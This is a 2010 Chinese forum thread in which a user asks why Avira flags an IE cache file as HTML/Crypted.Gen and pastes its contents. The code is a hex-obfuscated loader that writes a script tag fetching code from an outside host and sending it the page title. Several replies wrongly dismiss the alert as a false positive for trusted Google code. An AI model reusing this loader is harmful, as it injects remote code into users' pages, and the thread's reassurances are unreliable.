发布新话题与讨论建议及审查说明
欢迎发布有讨论和阅读价值的话题;不欢迎嘲弄宗教、种族、地缘、性取向等话题。
推崇布拉格公民论坛《对话守则》:对话的目的是寻求真理,不是为了斗争;不做人身攻击;保持主题;辩论时要用证据;要分清对话与只准自己讲话的区别;尽量理解对方。
遵循《世界人权宣言》第十九条不对用户已发表言论进行删除处理;用户有权限删除本人已发表言论;编辑会合并重复话题。
发新话题
收藏 订阅 推荐 打印

发现病毒或恶意程序!——高手请进

发现病毒或恶意程序!——高手请进

8日几乎一整天,小红伞不停拦截:发现病毒或恶意程序!
并提示:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

由于出现过于频繁,且均指向同一个位置,经查看,在IE临时文件夹中。但该位置文件无法用任何编辑软件打开,也无法复制。于是先在小红伞中将之隔离,再从隔离区恢复到另一个位置。该文件在IE临时文件夹中名为:116312516-notifierclient-js_zh-CN[1].VIR

将该文件更名为文本文件,然后打开,内容如下:

var _0x9713=["\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D","\x74\x69\x74\x6C\x65","\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x9713[0x3]](_0x9713[0x0]+encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write("<script language='javascript' src='http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-js_zh-CN.js?rr=1886680168'><\/script>");


将其中地址输入IE地址,执行后显示下载:116312516-notifierclient-js_zh-CN.js
该文件经小红伞扫描没有问题。

该地址主页为:Google Chat - Chat with family and friends

经搜索学习,“.VIR”文件是被杀毒软件标识的文件。那么,病毒程序是116312516-notifierclient-js_zh-CN.js吗?可该文件小红伞扫描认为没有问题!

我能做的就这些了,希望高手给予指教!!

补充:

点击“发新话题”时,小红伞立刻拦截:发现病毒或恶意程序!
提示同上:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式

[ 本帖最后由 北国游子 于 2010-5-8 13:40 编辑 ]
进安全模式全盘扫描一遍试试
查了一下,似乎是这个原因:
http://www.llsilver.com/invasion/xiaohongsan-HTML-Crypted.html

实话说这个解决方式挺矛盾的……
要是不扫临时文件夹的话,防护能力可是削弱了不少

还是得请善用伞的人士来讲解下怎么才能单独把这个屏蔽掉
原来并不真是病毒!

还真不好解决,排除IE临时文件夹,还真不放心。

每次提示的时候我选择删除或隔离,下面提示就不那么频繁了。但不知道那个JS文件到底是做什么的。

谢谢楼上!
我提供一个思路:
利用火狐浏览器的adblock plus插件
屏蔽有问题的js或者图片。

狗狗吃肉么浏览器下貌似也有相应的插件……

另外,本人用的是avast!
没见过,请问楼主是去什么网站报错的?

按照那个解释“所有的1*1框架和wideth=0的框架”都会报毒,不知道有哪些网站是这样?

而且如此频繁出现,到现在小红伞不可能还在误报吧

我是用了一年多的C版小红伞,在数十台机子装过,但好像都没见过这个问题
我同时开着很多窗口,感觉应该就是http://www.google.com.hk/ig?hl=zh-CN,但谷歌搜索我是默认打开的主页之一,只有那天出现这个情况。

回复 6楼 诺贝尔影帝 的话题

应该是小红伞对恶意网页定义过于宽泛的缘故……
虽然我用小红伞+firefox没有遇到这种情况

现在既然出中文版了, LZ你可以试试咨询官方

或者换avast吧
我在ie8试过http://www.google.com.hk/ig?hl=zh-CN
没有任何问题,楼主是ie6?

我倒不觉得小红伞对恶意网页定义宽泛,小红伞被指误报多,主要还是一些破解软件、注册机之类。

高启发是会严格些,不够规范的网页是容易报毒,但不至于对Google的网页也误报吧。

PS:玩过一个小游戏,大丰收,小红伞一定报毒的,为了给老人玩,只有排除掉。
我是IE8。

也不确定是http://www.google.com.hk/ig?hl=zh-CN&refresh=1造成的,但小红伞的隔离文件中有这样一段:

encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write("<script language='javascript' src='http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-js_zh-CN.js?rr=1886680168'><\/script>");

哪位高手可以解读

回复 10楼 北国游子 的话题

有啥好解读的,google的js你还不信任?
红伞最近误杀严重
发新话题

快速回复主题

 

[完成后可按 Ctrl+Enter 发布]  预览话题  恢复数据  清空内容

顾问:莫之许、北风、不锈钢老鼠、温克坚、艾未未、冉云飞、安替、崔卫平、闾丘露薇、章立凡 形象代言:宋石男 法律顾问:浦志强
编辑
:张书记、上肛上腺、抑扬、musicool、王祖贤、alix001、核子力量、四夕亚日、炽鸢侯、木火
技术:库存袈裟、麦圆、散光